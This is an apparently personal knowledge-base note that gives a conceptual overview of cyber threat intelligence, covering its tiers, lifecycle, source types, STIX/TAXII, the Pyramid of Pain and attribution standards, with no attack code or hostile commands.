Intelligence notes

Cyber Threat Intelligence (CTI)

13 min read

Cyber Threat Intelligence (CTI)

BLUF

Cyber Threat Intelligence (CTI) is the intelligence discipline dedicated to the systematic collection, analysis, and dissemination of information about adversary cyber capabilities, intentions, infrastructure, and Tactics, Techniques, and Procedures (TTPs). Its operational purpose is to reduce uncertainty for defenders — security operations centres (SOCs), incident responders, executive leadership, and national policymakers — and to enable proactive defensive posture rather than reactive incident handling. CTI is the cyber-domain application of the classical intelligence cycle: requirements drive collection, collection feeds analysis, analysis produces decision-supporting products, and feedback refines the next iteration.

Fact: CTI is not synonymous with raw threat data. A list of malicious IP addresses, a feed of malware hashes, or a dump of compromised credentials are indicators — observable artefacts — not intelligence. Intelligence is what emerges when indicators are contextualised against adversary behaviour, evaluated for source reliability, correlated across campaigns, and packaged for a specific consumer decision. Similarly, CTI is distinct from vulnerability management: vulnerability management addresses weaknesses in the defender’s own attack surface; CTI addresses the threat actors who may exploit those weaknesses, their capabilities, and their probable courses of action.

Assessment: CTI is the intelligence discipline where traditional intelligence methodology — collection tasking, structured source evaluation, analytic tradecraft (ICD 203 standards, structured analytic techniques), formal dissemination — intersects most directly with technical cybersecurity tradecraft (reverse engineering, network forensics, malware analysis). Effective CTI programmes require fluency in both worlds; the discipline’s failure modes typically reflect dominance of one culture over the other (pure threat-feed vendors with no analytic rigor; or analyst shops with no technical collection capability).

The CTI Pyramid and Intelligence Levels

CTI is conventionally stratified into three tiers, each targeting a different consumer, time horizon, and decision class.

TierTime HorizonConsumersProduct ExamplesDecision Supported
Strategic6–24 monthsC-suite, board, CISO, national policymakersAnnual threat landscape reports, sector risk assessments, geopolitical-cyber nexus analysisInvestment prioritisation, regulatory positioning, M&A risk, sovereign technology decisions
OperationalDays to weeksSOC leadership, incident commanders, threat hunters, red team leadsCampaign tracking reports, TTP cluster analyses, kill-chain mapping, hunt hypothesesDetection engineering priorities, hunting campaigns, IR playbook activation
TacticalHours to daysSIEM engineers, firewall admins, EDR platformsIOC feeds, YARA rules, Snort/Suricata signatures, STIX bundlesAutomated blocking, alert tuning, signature deployment

Strategic CTI answers questions of the form “Which state and non-state cyber adversaries are most likely to target our sector over the next budget cycle, and how should that shape our security investment?” It draws heavily on geopolitical analysis, adversary doctrine (PLA Strategic Support Force, GRU Unit 26165, IRGC cyber commands), and longitudinal trend data. Assessment: this tier is structurally under-served — most CTI vendors over-index on tactical output because it is easier to productise and easier to demonstrate as ROI in renewal cycles.

Operational CTI is the tier where campaign clustering occurs: linking observed intrusions to known threat groups (APT29, Lazarus, Volt Typhoon, Sandworm), mapping their kill-chain stages, and predicting next moves. It is the tier most directly informed by frameworks like MITRE ATT&CK and the Lockheed Martin Cyber Kill Chain.

Tactical CTI is the high-volume, short-half-life tier. Its products are machine-readable indicators consumed primarily by automated defensive systems, not by human analysts.

The CTI Lifecycle

CTI applies the classical Intelligence Cycle to the cyber domain, with discipline-specific refinements at each stage.

1. Direction

Defining Priority Intelligence Requirements (PIRs) specific to the consuming organisation. Example PIRs for a financial institution: “What ransomware actors are currently targeting Tier-1 banks?”, “Which credential-stealer families are most prevalent in our regulatory geography?”, “What initial-access broker offerings would expose our perimeter?” PIRs constrain collection — without them, CTI degenerates into untargeted threat-feed consumption.

2. Collection

Structured per the sources section below. Collection must be tasked against PIRs, with explicit source evaluation (reliability A–F, information credibility 1–6 — the NATO admiralty grading system).

3. Processing

Normalisation of heterogeneous data formats (STIX 2.1, OpenIOC, MISP event format, vendor-proprietary JSON), deduplication across overlapping feeds, enrichment (passive DNS lookups, WHOIS, geolocation, reputation scoring), and false-positive filtering. Fact: a poorly tuned IOC feed can generate more analyst burden than it removes — false-positive rates above ~5% typically erode SOC confidence in the feed.

4. Analysis

TTP mapping against MITRE ATT&CK, campaign clustering using diamond-model pivots (adversary, capability, infrastructure, victim), actor Attribution with confidence assessment, and prioritisation by relevance to PIRs. Structured analytic techniques — Analysis of Competing Hypotheses (ACH), Key Assumptions Check, devil’s advocacy — are particularly important for attribution work, where confirmation bias and politically-motivated false-flag operations are documented risks.

5. Dissemination

Format and channel matched to the consumer tier. Strategic intelligence is disseminated as prose reports and executive briefings; operational intelligence as analyst memoranda and threat hunt packages; tactical intelligence as STIX bundles pushed via TAXII into SIEM/EDR platforms.

6. Feedback

Structured consumption of analyst and SOC feedback — which feeds produced actionable alerts, which produced noise, which PIRs went unanswered — to refine the next cycle. Assessment: this stage is the most frequently neglected; CTI programmes that lack a formal feedback loop tend to ossify around legacy collection rather than evolving with the threat landscape.

CTI Sources — Collection Layer

OSINT

  • Malware repositories: VirusTotal, Malshare, ANY.RUN, Hybrid Analysis, Malpedia. Provide samples, sandbox traces, and behavioural artefacts. VirusTotal in particular functions as a global passive observatory of malware in circulation.
  • Threat actor tracking blogs: Mandiant/Google TAG, Microsoft MSTIC (Threat Intelligence Center), Secureworks Counter Threat Unit, SentinelOne SentinelLabs, Recorded Future Insikt Group, Citizen Lab, ESET WeLiveSecurity, Kaspersky GReAT, CrowdStrike Adversary Universe.
  • Passive DNS platforms: VirusTotal, Censys, SecurityTrails (now Recorded Future), DomainTools, RiskIQ (Microsoft Defender Threat Intelligence). Enable infrastructure pivoting from a single indicator to an adversary’s operational network.
  • Certificate transparency: crt.sh, Censys CT logs — surface adversary domain provisioning in near-real-time.
  • Underground forum monitoring: see Dark Web Methodology.

ISAC/ISAO Sharing

Sector-specific Information Sharing and Analysis Centers operate as trusted distribution hubs:

  • FS-ISAC (financial services)
  • E-ISAC (electricity/energy)
  • H-ISAC (healthcare)
  • MS-ISAC (US state/local/tribal/territorial government)
  • Aviation-ISAC, Auto-ISAC, Space-ISAC

ISACs typically distribute STIX/TAXII feeds governed by Traffic Light Protocol (TLP) markings — TLP:RED member-only, TLP:AMBER restricted, TLP:GREEN community, TLP:CLEAR public.

Commercial CTI Feeds

Recorded Future, Mandiant Advantage, CrowdStrike Falcon Intelligence, Intel 471, Flashpoint, Group-IB, Team Cymru. Assessment: quality differentiation among vendors tracks (a) primary collection capability (proprietary sensor networks, dark-web HUMINT) vs. OSINT aggregation, (b) analyst depth and regional/linguistic coverage, and (c) latency from collection to product. Treat vendor self-attestation of “primary collection” with skepticism — independent validation is rarely available.

Internal Telemetry

EDR/XDR logs, SIEM event streams, DNS query logs, NetFlow/IPFIX, authentication logs. Fact: the organisation’s own intrusion history is, for that specific environment, the highest-fidelity threat-intelligence source available. A blocked phishing attempt against your CFO is more relevant intelligence for your defence than a generic IOC feed entry. CTI programmes that ignore internal telemetry in favour of external feeds invert the value pyramid.

Dark Web / Underground Markets

Ransomware leak sites (initial-access brokers, double-extortion victim listings), credential markets (Genesis Market — disrupted 2023; Russian Market; 2easy), exploit brokerages, malware-as-a-service forums. See Dark Web Methodology and DARKINT.

HUMINT / Liaison

Law-enforcement threat briefings (FBI Cyber Division, CISA, UK NCA, Europol EC3, BKA, AFP), trusted community relationships (CERT-to-CERT exchanges, FIRST membership), vetted researcher relationships. Gap: this collection channel is heavily dependent on personal trust and is structurally inaccessible to organisations without an established security maturity baseline.

STIX / TAXII — The Interoperability Standard

STIX 2.1 (Structured Threat Information eXpression) is an OASIS-standard JSON-based language for representing cyber threat intelligence. TAXII 2.1 (Trusted Automated eXchange of Indicator Information) is the companion transport protocol — an HTTPS-based REST API for publishing and subscribing to STIX bundles.

STIX 2.1 Domain Object (SDO) Types

ObjectPurpose
indicatorPattern matching observable artefacts (IPs, hashes, domains)
malwareMalicious software families and variants
threat-actorIndividual or group conducting malicious activity
intrusion-setGrouped TTPs/infrastructure attributed to one actor
campaignCoordinated set of intrusions toward an objective
attack-patternTTP description (frequently MITRE ATT&CK technique)
course-of-actionDefensive or mitigation action
toolLegitimate software used adversarially
vulnerabilityCVE-class weakness
reportAnalyst-curated narrative bundling other SDOs
note, opinionAnalytic commentary
sightingObservation of an indicator in the wild
relationshipTyped link between any two SDOs

Why It Matters for OSINT

STIX encodes threat intelligence in a machine-readable format that enables automated ingestion, correlation, and sharing across organisational boundaries. Fact: MITRE ATT&CK itself is distributed as a STIX bundle. MISP (open-source CTI platform) natively imports/exports STIX. Most commercial CTI platforms support STIX/TAXII as their primary interoperability surface.

Limitations

Assessment: STIX-encoded tactical IOCs have a short operational half-life — IP addresses rotate in hours, domains in days, hashes change with each malware build. The durable analytic value embedded in STIX bundles is the TTP-level content (attack-pattern, intrusion-set SDOs) rather than the indicator-level content. Organisations that ingest STIX purely for indicator blocking extract a fraction of its potential value.

IOC Lifecycle and the Pyramid of Pain

In 2013 David Bianco proposed the Pyramid of Pain, a model that ranks IOC types by the cost imposed on the adversary when defenders successfully detect and remediate that indicator class.

                    ▲   TTPs              (tough!)
                   ╱ ╲  Tools             (challenging)
                  ╱   ╲ Network Artifacts (annoying)
                 ╱     ╲Host Artifacts    (annoying)
                ╱       ╲Domain Names     (simple)
               ╱         ╲IP Addresses    (easy)
              ╱___________╲Hash Values    (trivial)
  • Bottom (trivial pain to change): Hash values, IP addresses. The adversary regenerates these between operations — sometimes between hours of an operation.
  • Middle (moderate pain): Domain names, host artefacts, network artefacts. More expensive to rotate but still routine adversary tradecraft.
  • Top (maximum pain): TTPs. Forcing an adversary to abandon a technique, retrain operators, or rebuild tooling imposes weeks-to-months of cost.

Assessment: IOC-sharing programmes anchored at the bottom two tiers are a treadmill — the defender invests effort that the adversary defeats by rotation. TTP-level intelligence that enables behaviour-based detection (e.g., process-tree heuristics, sequence-of-events SIEM rules) is the sustainable defensive investment. Gap: most commercial CTI products over-produce tactical IOCs and under-produce TTP-level analysis; this quality asymmetry has persisted across the industry for over a decade despite repeated practitioner critique.

CTI and OSINT Integration

CTI is the intelligence discipline most explicitly dependent on open-source collection. Three structural reasons:

  1. Adversary infrastructure is publicly observable. Passive DNS, certificate transparency logs, Shodan/Censys scans of internet-facing hosts, and BGP route observatories expose adversary operational infrastructure to anyone with the tools to query them.
  2. Malware is publicly co-collected. Victims and security researchers routinely submit samples to VirusTotal, ANY.RUN, and similar platforms. This produces a global, near-real-time corpus of adversary tooling accessible to any analyst with appropriate access.
  3. Threat actor TTPs are documented in public research. The threat-research industry has strong incentives (marketing, recruitment, customer education) to publish detailed analyses, which collectively constitute a public knowledge base of adversary tradecraft.

Assessment: a significant portion of enterprise-grade CTI production is traceable to OSINT collection. The added value of commercial CTI providers is typically in (a) collection breadth (more sensors, more languages, more forums), (b) correlation at scale (graph databases linking indicators across years of observations), and (c) analyst time-savings — not in unique classified collection unavailable to a well-resourced internal team. This has implications for build-vs-buy decisions in CTI programme design.

CTI in Support of National Security

CTI feeds upward from commercial and sector-level production into national intelligence products via several mechanisms:

  • CISA Known Exploited Vulnerabilities (KEV) Catalog: a US-government-curated list of CVEs with confirmed active exploitation. Effectively a high-confidence tactical CTI product distributed to federal agencies (mandatory remediation under BOD 22-01) and the broader community.
  • Joint advisories: NSA/CISA/FBI publications, frequently co-signed by Five Eyes partners (NCSC-UK, CCCS Canada, ACSC Australia, NCSC-NZ), naming specific adversary units (e.g., GRU Unit 26165 / Fancy Bear, MSS-affiliated groups) with TTPs and IOCs.
  • Coordinated attribution advisories: Five Eyes joint statements naming state actors, increasingly accompanied by DOJ indictments of named officers — the most rigorous publicly verifiable attribution mechanism.
  • Declassified intelligence weaponisation: pre-2022 Russian invasion of Ukraine, the US and UK governments executed an unprecedented declassification campaign — pre-emptively attributing planned Russian operations, exposing false-flag preparations, and disrupting Russian information advantage. Assessment: this established a new operational model for using CTI as a strategic-communications instrument.

Gap — Attribution Standards

Gap: The CTI community lacks a systematic, publicly verifiable, peer-reviewed attribution standard. Commercial attributions (e.g., “we assess with high confidence this campaign is APT-XYZ”) carry implicit methodological claims about source quality, analytic rigor, and confidence calibration that are rarely externally validated. Different vendors regularly publish overlapping cluster taxonomies with inconsistent boundaries (APT28 vs. Sofacy vs. Fancy Bear vs. STRONTIUM vs. Forest Blizzard — all referencing substantially the same adversary, but with shifting scopes and confidence bases).

The US Government indictment model — DOJ charging named foreign officers with documented TTPs, infrastructure, and operational detail — remains the most rigorous public attribution mechanism, because it is testable against an evidentiary standard. However, indictments are driven by prosecutorial, political, and legal considerations rather than purely analytical ones, which constrains their use as a general attribution-standards reference.

Strategic Implications

  • CTI is OSINT-dependent at its core — programmes that treat commercial feeds as a substitute for open-source collection capability are paying for what they could largely produce internally, and surrendering analytical control of their own threat model.
  • The Pyramid of Pain is a budget allocation tool — investment in TTP-level analysis (detection engineering, threat hunting, behavioural analytics) compounds; investment in tactical IOC consumption depreciates within days.
  • Attribution is an analytical product, not a fact — consumers of CTI should treat all attribution claims as conditional assessments with confidence levels and underlying evidence, not as ground truth, particularly in geopolitically sensitive contexts where false-flag operations are documented adversary tradecraft.
  • CTI is the integration point between cyber and traditional intelligence — geopolitical analysis, Counterintelligence, and Signals Intelligence all interact with CTI; isolating CTI as a purely technical discipline forfeits this integration value.
  • The declassification model is replicable but fragile — the 2022 Ukraine pre-invasion intelligence-weaponisation campaign demonstrated CTI’s strategic-communications utility, but depends on political conditions and source-protection trade-offs that may not generalise.

Sources

  1. Mandiant. M-Trends (annual report series, 2010–present). Mandiant/Google Cloud — particularly editions covering APT1 (2013), APT28/29 (2017), Volt Typhoon (2023+). [primary, vendor analytical]
  2. MITRE Corporation. ATT&CK Framework Documentation. attack.mitre.org. STIX-distributed adversary TTP knowledge base. [primary, authoritative]
  3. Bianco, David. “The Pyramid of Pain” (blog post, originally 2013; revised). Enterprise Detection & Response. detect-respond.blogspot.com. [primary, practitioner]
  4. OASIS Cyber Threat Intelligence Technical Committee. STIX 2.1 and TAXII 2.1 Specifications. docs.oasis-open.org/cti/. [primary, standards body]
  5. CISA. Known Exploited Vulnerabilities Catalog and joint cybersecurity advisories. cisa.gov/known-exploited-vulnerabilities-catalog. [primary, authoritative]
  6. NSA / CISA / FBI joint advisories on Russian, Chinese, Iranian, and DPRK state-actor activity (2018–present). [primary, authoritative]
  7. Recorded Future. Annual Threat Intelligence Reports (Insikt Group). recordedfuture.com. [primary, vendor analytical]
  8. CrowdStrike. Global Threat Report (annual). crowdstrike.com. [primary, vendor analytical]

Key Connections

Intelligence, Intelligence Cycle, Signals Intelligence, OSINT, Dark Web Methodology, DARKINT, Advanced Persistent Threats, Attribution, Network Analysis Methodology, Shodan-Censys Guide, Traffic Light Protocol, Counterintelligence, Indications and Warning, Disinformation Detection Methodology, Python OSINT Automation Guide

Graph View

Backlinks